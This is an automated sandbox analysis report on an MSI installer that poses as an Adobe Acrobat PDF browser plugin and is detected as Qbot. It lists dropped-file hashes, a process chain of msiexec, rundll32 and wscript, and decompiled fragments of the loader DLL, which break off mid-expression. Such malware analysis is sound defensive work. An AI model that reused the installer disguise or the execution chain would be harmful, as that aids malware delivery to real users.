                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):0.12071429906577896
                                                    Encrypted:false
                                                    SSDEEP:24:jIAWMQQt70R818lOdWmOLqrb9ipVIdWmOLqrb9ipV7VO3wGolrkgra+vMsvKL:cAWMN+R818lEuLMSouLMS5kArragMs
                                                    MD5:5A66F5FD08B8CA2249380DDDF49D9D33
                                                    SHA1:B4BD32E998A3A44BCC463E516596546E00296F96
                                                    SHA-256:7825ED9BF119F45394DD851AAE50644AF5B0A10637237F55A7611CCCBDCCB99A
                                                    SHA-512:4B13BD300E31411552873C292F037754D0D40AB5B9AA9941463F9A82099C4CABE7EE3B019753FB57046925FD63006A78B3941B0CF4FEC5EC663AA33F4DB13166
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):1.209919737144819
                                                    Encrypted:false
                                                    SSDEEP:48:rsHugPveFXJxT5+0gMPduLMS5kArD6uLMSI818lP7AWMN:IHAJTrTPRtfA
                                                    MD5:5F8C47B7D4AFB1220F17DA429EAACB81
                                                    SHA1:14180142867FDD137664D86CE077E44BB66C5DF9
                                                    SHA-256:99A8B2F8F6B46ABADD467B39C55BECCE99C50AD04E3CCD0C5238548AA14257F7
                                                    SHA-512:C7E3E848B867F1309B56B7F273434C906AF6ACF854A486B52A3B66C233976592DA52692535AD3E6C3B4D16A0AE46F7C7FB2A18707F056B95840781F73719CDDD
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):1.209919737144819
                                                    Encrypted:false
                                                    SSDEEP:48:rsHugPveFXJxT5+0gMPduLMS5kArD6uLMSI818lP7AWMN:IHAJTrTPRtfA
                                                    MD5:5F8C47B7D4AFB1220F17DA429EAACB81
                                                    SHA1:14180142867FDD137664D86CE077E44BB66C5DF9
                                                    SHA-256:99A8B2F8F6B46ABADD467B39C55BECCE99C50AD04E3CCD0C5238548AA14257F7
                                                    SHA-512:C7E3E848B867F1309B56B7F273434C906AF6ACF854A486B52A3B66C233976592DA52692535AD3E6C3B4D16A0AE46F7C7FB2A18707F056B95840781F73719CDDD
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):1.209919737144819
                                                    Encrypted:false
                                                    SSDEEP:48:rsHugPveFXJxT5+0gMPduLMS5kArD6uLMSI818lP7AWMN:IHAJTrTPRtfA
                                                    MD5:5F8C47B7D4AFB1220F17DA429EAACB81
                                                    SHA1:14180142867FDD137664D86CE077E44BB66C5DF9
                                                    SHA-256:99A8B2F8F6B46ABADD467B39C55BECCE99C50AD04E3CCD0C5238548AA14257F7
                                                    SHA-512:C7E3E848B867F1309B56B7F273434C906AF6ACF854A486B52A3B66C233976592DA52692535AD3E6C3B4D16A0AE46F7C7FB2A18707F056B95840781F73719CDDD
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.5060877643473185
                                                    Encrypted:false
                                                    SSDEEP:48:58PhfuRc06WXJ8FT5K0gMPduLMS5kArD6uLMSI818lP7AWMN:0hf1fFT3TPRtfA
                                                    MD5:430F2ADF3561DDB478079AF68E971D68
                                                    SHA1:7431BA57FB0275B6276BBA7370A317D67552D8B6
                                                    SHA-256:8A709B97AFBFAA9E5CD5D3C566F95D370FE69AC31260A6F3C2FF82619F3D1026
                                                    SHA-512:5A3904A81D986EE27F31D27383BB70BE01C709BFF580B7CD2AF184F8C8539439A3F38821B5C0D32B42F57DF0B92BC771B5ED7264082F842D19F346D3667C669A
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.5060877643473185
                                                    Encrypted:false
                                                    SSDEEP:48:58PhfuRc06WXJ8FT5K0gMPduLMS5kArD6uLMSI818lP7AWMN:0hf1fFT3TPRtfA
                                                    MD5:430F2ADF3561DDB478079AF68E971D68
                                                    SHA1:7431BA57FB0275B6276BBA7370A317D67552D8B6
                                                    SHA-256:8A709B97AFBFAA9E5CD5D3C566F95D370FE69AC31260A6F3C2FF82619F3D1026
                                                    SHA-512:5A3904A81D986EE27F31D27383BB70BE01C709BFF580B7CD2AF184F8C8539439A3F38821B5C0D32B42F57DF0B92BC771B5ED7264082F842D19F346D3667C669A
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):0.06947604271114201
                                                    Encrypted:false
                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOGljlnucCRjQVky6lS:2F0i8n0itFzDHFZRRS
                                                    MD5:D429E7962EAB07E07C545C296E8B0F35
                                                    SHA1:9AC331509B3E15434194BAECFA89488D380435FC
                                                    SHA-256:14064733FE0126C92AE648CE46DD3AF9820F19CA4F87B6FFCD9134C3A4FD19EE
                                                    SHA-512:BF7726A85BAFFE69B531188332BBE26F1ADFF215BAB9CB3FFA26B2FC1A6D6D337328E1670526C5040AF4C6F39E838456DE85834EBB97A704A641A76132970259
                                                    Malicious:false
                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}, Create Time/Date: Tue May 30 14:29:16 2023, Last Saved Time/Date: Tue May 30 14:29:16 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                    Entropy (8bit):7.919635795804226
                                                    TrID:
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                    File name:r3zg12.msi
                                                    File size:507904
                                                    MD5:665afc8f8b7972f427fe1bd90d263032
                                                    SHA1:cc36e48f383750eb9416961b52ee3100b6e30688
                                                    SHA256:d764436caf7114d880f982d208bd9514a433772dcac851f27c510d1597e26edd
                                                    SHA512:d30110dc240790a1f0c15df31069d361f80df327c258dd3305e70eb9ee3814c285ab6290e88e4072b375f7dac3d183d22aba29cb94fdd7db937c4399c18ad37e
                                                    SSDEEP:12288:vn+NgINNEcfjVRMigNFoILI8KviLjvhAN+S0w3:vnX9gjVRMDqH8fL1+35
                                                    TLSH:21B42359660A6371C4C826B2E73E77CFAAA27C5507038433C33B72DE1D775B81A663A1
                                                    Icon Hash:2d2e3797b32b2b99
                                                    No network behavior found

                                                    Target ID:0
                                                    Start time:18:06:19
                                                    Start date:30/05/2023
                                                    Path:C:\Windows\System32\msiexec.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\r3zg12.msi"
                                                    Imagebase:0x7ff729140000
                                                    File size:66048 bytes
                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:1
                                                    Start time:18:06:19
                                                    Start date:30/05/2023
                                                    Path:C:\Windows\System32\msiexec.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                    Imagebase:0x7ff729140000
                                                    File size:66048 bytes
                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:2
                                                    Start time:18:06:21
                                                    Start date:30/05/2023
                                                    Path:C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
                                                    Imagebase:0x7ff709920000
                                                    File size:69632 bytes
                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:3
                                                    Start time:18:06:21
                                                    Start date:30/05/2023
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
                                                    Imagebase:0x7ff715d10000
                                                    File size:163840 bytes
                                                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:4
                                                    Start time:18:06:21
                                                    Start date:30/05/2023
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
                                                    Imagebase:0x80000
                                                    File size:61952 bytes
                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:5
                                                    Start time:18:06:24
                                                    Start date:30/05/2023
                                                    Path:C:\Windows\SysWOW64\wermgr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\wermgr.exe
                                                    Imagebase:0x50000
                                                    File size:191904 bytes
                                                    MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                      Execution Graph

                                                      Execution Coverage:0.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:10
                                                      Total number of Limit Nodes:0
                                                      execution_graph 13729 1002a4e1 13730 1002a519 VirtualFree 13729->13730 13732 1002a4d0 13730->13732 13733 1002a4fb 13734 1002a524 VirtualProtect 13733->13734 13735 1002a52f 13734->13735 13736 1002a61e 13737 1002a624 13736->13737 13738 1002a6ba VirtualAlloc 13737->13738 13739 1002a684 13738->13739

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 1002a4fb-1002a52a VirtualProtect 2 1002a5be-1002a5c5 0->2 3 1002a5b1-1002a5b9 2->3 4 1002a5c7 2->4 5 1002a801-1002a804 3->5 4->5
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?), ref: 1002A524
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 485ff5df04f8ee2b44346524c68e78e88d06071511fcdec404aceb0375cb2ab2
                                                      • Instruction ID: 00f80fa798212d279aa3a4e3fc9d35ec11821ce49b1a2f68508c6e23295b72c3
                                                      • Opcode Fuzzy Hash: 485ff5df04f8ee2b44346524c68e78e88d06071511fcdec404aceb0375cb2ab2
                                                      • Instruction Fuzzy Hash: 0DE09A70D08529EFCB20DB84E180A9DBBB1FB0A325FA54481ED51A6211CB35EE85AF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00002F44,?,00002F44,00000002), ref: 1002A6BA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: c8a91bb3f52504b34851642bff6f911aa0904a126f9de841362222e4fb7c4aba
                                                      • Instruction ID: 8a4044d8f8fd50a6a134e65f0457b5eacbbcbdc5684dba151f3aee4cf353d954
                                                      • Opcode Fuzzy Hash: c8a91bb3f52504b34851642bff6f911aa0904a126f9de841362222e4fb7c4aba
                                                      • Instruction Fuzzy Hash: B81142B1D1C205EFDB30DA90FCD974DA6B8E71A204FF94026AE0065242EF2518C4BA25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 42 1002a4e1-1002a61c VirtualFree 55 1002a59b-1002a59f 42->55 56 1002a5a1 55->56 57 1002a5a9-1002a5ac 55->57 56->57
                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,00007E7E,00007E7E), ref: 1002A5FE
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 0641292201ec43dba3f4cc9da24f777aeb42a299be4718644466048f13d02087
                                                      • Instruction ID: 758a69f25ca6f6719b3215040b18abb149fc83eeb57a41baf1fe90a80d390342
                                                      • Opcode Fuzzy Hash: 0641292201ec43dba3f4cc9da24f777aeb42a299be4718644466048f13d02087
                                                      • Instruction Fuzzy Hash: F8012571D08929EFDF66CE80E988A9E7AB5FB06204FA000A1ED0162121DB359A90FB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_small_strptime
                                                      • String ID: %H%M%S$%H:%M$%H:%M:%S$%J:%M:%S$%M:%S$%Y - %m - %d$%Y%m%d$gfff$now
                                                      • API String ID: 1704653723-929505383
                                                      • Opcode ID: 70551c3f807884e4d46f3108702462cb1203eb33ef54204aec50387936ae1137
                                                      • Instruction ID: 646b59ec4b146e931ed9e50608571c6f79c7907caae039c014e067c05dcc172a
                                                      • Opcode Fuzzy Hash: 70551c3f807884e4d46f3108702462cb1203eb33ef54204aec50387936ae1137
                                                      • Instruction Fuzzy Hash: 8042F471A083458FD714CF28D48076AFBE2EFC5384F95897EE889C7352E631D9468B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 27%
                                                      			E1000D4D0(void* __ebx, void* __edi, void* __esi) {
                                                      				char _t142;
                                                      				intOrPtr _t144;
                                                      				signed int _t145;
                                                      				signed int _t148;
                                                      				char _t160;
                                                      				signed int _t163;
                                                      				signed int _t166;
                                                      				unsigned int _t178;
                                                      				signed int _t182;
                                                      				char* _t191;
                                                      				char _t192;
                                                      				char* _t206;
                                                      				void* _t211;
                                                      				unsigned int _t227;
                                                      				intOrPtr _t238;
                                                      				intOrPtr _t241;
                                                      				signed int _t243;
                                                      				signed int _t250;
                                                      				signed int _t272;
                                                      				intOrPtr _t273;
                                                      				char* _t280;
                                                      				unsigned int _t284;
                                                      				intOrPtr _t285;
                                                      				signed int _t289;
                                                      				signed int _t292;
                                                      				void* _t293;
                                                      				char* _t329;
                                                      				unsigned int _t330;
                                                      				unsigned int _t332;
                                                      				signed int _t333;
                                                      				signed int _t337;
                                                      				unsigned int _t341;
                                                      				unsigned int _t351;
                                                      				char* _t353;
                                                      				intOrPtr _t379;
                                                      				char* _t380;
                                                      				signed int _t381;
                                                      				signed int _t382;
                                                      				char* _t386;
                                                      				unsigned int _t387;
                                                      				signed int _t388;
                                                      				char* _t390;
                                                      				signed int _t395;
                                                      				void* _t397;
                                                      				signed int _t399;
                                                      				signed int _t402;
                                                      				void* _t403;
                                                      				char _t420;
                                                      				signed int _t421;
                                                      				char* _t423;
                                                      				signed int _t425;
                                                      				char* _t426;
                                                      				char* _t428;
                                                      				void* _t431;
                                                      				char** _t432;
                                                      				char** _t434;
                                                      				char** _t435;
                                                      				intOrPtr* _t438;
                                                      				void* _t440;
                                                      
                                                      				_push(__edi);
                                                      				_push(__esi);
                                                      				_push(__ebx);
                                                      				_t432 = _t431 - 0x2c;
                                                      				_t423 = _t432[0x10];
                                                      				_t432[6] = _t432[0x11];
                                                      				_t142 =  *_t423;
                                                      				_t440 = _t142 - 2;
                                                      				if(_t440 == 0) {
                                                      					L60();
                                                      					if(_t432[6] >= 0) {
                                                      						goto L8;
                                                      					} else {
                                                      						goto L14;
                                                      					}
                                                      					goto L12;
                                                      				} else {
                                                      					if(_t440 > 0) {
                                                      						if(_t142 != 3) {
                                                      							_t144 = 0xffffffea;
                                                      							goto L12;
                                                      						} else {
                                                      							_t191 = _t432[6];
                                                      							_t434 =  &(_t432[0xb]);
                                                      							_t353 = _t423;
                                                      							_pop(_t273);
                                                      							_pop(_t403);
                                                      							_pop(_t389);
                                                      							_pop(_t427);
                                                      							_t428 = _t353;
                                                      							_t390 = _t191;
                                                      							_push(_t403);
                                                      							_push(_t273);
                                                      							_t435 = _t434 - 0x4c;
                                                      							_t192 =  *_t353;
                                                      							if(_t192 == 3) {
                                                      								_t206 = _t428[4];
                                                      								_t280 =  &(_t206[ !((((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f) + (((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 